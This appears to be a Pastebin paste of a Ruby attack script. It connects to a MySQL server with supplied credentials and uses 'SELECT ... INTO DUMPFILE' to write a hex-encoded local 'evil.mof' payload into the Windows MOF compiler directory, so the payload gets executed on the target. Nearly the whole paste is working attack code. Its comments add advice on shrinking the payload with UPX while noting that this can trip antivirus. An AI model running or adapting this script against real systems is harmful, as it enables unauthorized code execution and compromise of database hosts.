Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env ruby
- # Code Snippet by HR
- # We need mysql gem for connection handling
- require 'rubygems'
- require 'mysql'
- target='127.0.0.1' # Your Target IP running MySQL
- user='username' # MySQL User
- pass='password' # MySQL Password
- file='/local/path/to/evil.mof' # Local Evil .MOF File to upload
- target_path="c:\\\\windows\\\\system32\\\\wbem\\\\mof\\\\evil.mof" # Path on Target to MOF compiler
- # Establish connection or fail
- begin
- dbc = Mysql.connect(target, user, pass)
- rescue Mysql::Error => e
- puts "Connection Problem!"
- puts "\t=> #{e}"
- exit 666;
- end
- # Take our local file, convert to hex and write to target filesystem
- # This will work for any binary file, not just .MOF files....
- # Try to keep your upload file size small or you will have to use more SQL magic to upload it in chunks to a temp db and table, then dump the table content to file but lets keep it simple....
- data = "0x" + File.open(file, 'rb').read.unpack('H*').first
- begin
- dbc.query("SELECT #{data} INTO DUMPFILE '#{target_path}'")
- puts "File uploaded successfully!"
- rescue Mysql::Error => e
- puts "Problem writing payload to file!"white
- puts "\t=> #{e}"
- if e =~ /MySQL server has gone away/
- puts "This is likely due to payload which is too large in size....."
- puts "Try compressing with UPX to shrink size down: upx 9 -qq #{file}" # UPX can shrink your payload big time, but can cause some AV to freak out so be smart and use what works for you....
- puts "\t=> Then try again....."
- end
- end
- #EOF
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement